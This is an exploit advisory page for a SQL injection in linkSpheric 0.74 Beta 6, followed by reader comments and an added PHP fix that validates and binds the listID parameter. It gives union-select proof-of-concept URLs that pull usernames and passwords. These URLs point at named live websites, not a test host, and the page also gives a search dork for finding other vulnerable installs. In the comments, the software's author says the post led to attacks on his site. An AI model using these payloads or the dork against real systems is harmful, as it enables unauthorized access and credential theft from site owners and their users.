linkSpheric 0.74 Beta 6 SQL Injection Vuln


[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

11 Responses so far.

  1. Anonymous says:

    Hello!

    I represent the group of friends who wrote linkSpheric. LOL!!

    It might seem that you have successfully penetrated this database. I think this is an important consideration for users of linkSpheric software because it was originally designed around php3 and has not been an active project for some years.

    However, because linkSpheric is directory software, in other words, the information contained in a linkSpheric directory is intended to be public, I do not consider this to be a big deal.

    I congratulate the hacker. And if you have seen Viper, tell him I send my regards and best wishes.

  2. NoGe says:

    hello too..

    i'm looking for bugs
    and your script is buggy
    so i post it up
    i don't change any databases

    btw, who is Viper??
    i don't know him.

  3. Anonymous says:

    You are correct. linkSpheric was never completed. This is why we decided to give it away for free :)

    I know you did not harm the database. But I think you were able to execute a script. One of the records you found contains the name of my friend Viper. I thought it is possible that you are Viper playing a joke on me.

    We no longer work on linkSpheric. If you want to, you can repair this vulnerability and you will get full credit. You will find the source code here:

    http://sourceforge.net/projects/linkspheric/

    Because linkSpheric is used by so many people in many different countries, I think it is possible that many people will thank you if you fix this vulnerability.

    I hope you have a good weekend.

  4. Jack says:

    it just takes 2 minutes to patch it :) believe me

  5. Vrs-hCk says:

    68: $result = mysql_query("SELECT * FROM listings WHERE id = '$listID' ");

    Try to fix viewListing.php with this line :)

  6. Anonymous says:

    i want to know. are you a believer or are you an infidel?

    Allah Hu Abkbur.

  7. Anonymous says:

    i think you should take responsibility. it is good to be a hacker, but you can be more professional.

    i can tell my programmer to fix the code or you can do it.

    i think you deserve the credit. i think this will be good for you.

    do you want a job?

  8. Anonymous says:

    friend, now everybody is hacking me. what have you done to me?

  9. NoGe says:

    what the fuck??
    if you have a programmer, you can tell your programmer to fix it. DON'T BE LAZY!!

    ==========
    i want to know. are you a believer or are you an infidel?
    Allah Hu Abkbur.
    ==========

    what's that supposed to mean?
    no religious bias here!!

  10. Anonymous says:

    lols. ok. i thought you were attacking me because i am muslim. no problem.

    you must understand that i am old and retired. i am not a young man. i use all the money i get now to feed my kids. so you are smart and young. i have no desire to fight with you.

    but i also appreciate your sense of humor.

    can i bless you?

    May God, Allah, bless you and keep you
    May Allah make His face to shine upon you. May Allah give you increase, both you and your children so that you may dwell in the house of Allah forever. So that you will be happy.

    Bless you hacker. you are a good hacker.

  11. Jack says:

    woooyoooo ^^
    feel the sensation.

    Ge, take the code, patch, and re-publish. full credits eh?

    stupid code
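
The one-line change quoted in comment 5 wraps $listID in quotes, which stops the injection only if the value is also escaped. The sketch below is an added example (not linkSpheric's code and not from any commenter) that validates listID as an integer and binds it as a query parameter. Assumptions: PDO with an in-memory SQLite database stands in for MySQL so it runs offline, the function names and sample rows are constructed, and the listings/id names come from the query quoted in comment 5.

```php
<?php
// Added example, not linkSpheric code. SQLite in memory stands in for the
// MySQL server; table/column names are from the query quoted in comment 5,
// the rows and function names are constructed for illustration.
declare(strict_types=1);

function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT)');
    $db->exec("INSERT INTO listings (id, title) VALUES
               (5, 'Constructed listing A'), (52, 'Constructed listing B')");
    return $db;
}

/**
 * Returns the listing row, or null when listID is not a positive integer
 * or no such row exists. In viewListing.php the raw value would be
 * $_GET['listID'].
 */
function fetchListing(PDO $db, $rawListId): ?array
{
    // 1. Validate: listID must be a plain positive integer, nothing else.
    $id = filter_var($rawListId, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Bind: the value travels as a parameter and never becomes SQL text.
    $stmt = $db->prepare('SELECT id, title FROM listings WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = openDemoDb();
// Constructed inputs: a normal id, the shape of the request in the advisory
// (shortened), a value containing a quote, and a missing parameter.
$samples = ['52', '-52 union select 1,2,3', "5' --", null];
foreach ($samples as $raw) {
    $row = fetchListing($db, $raw);
    printf("%-28s => %s\n", var_export($raw, true),
           $row === null ? 'rejected / not found' : $row['title']);
}
```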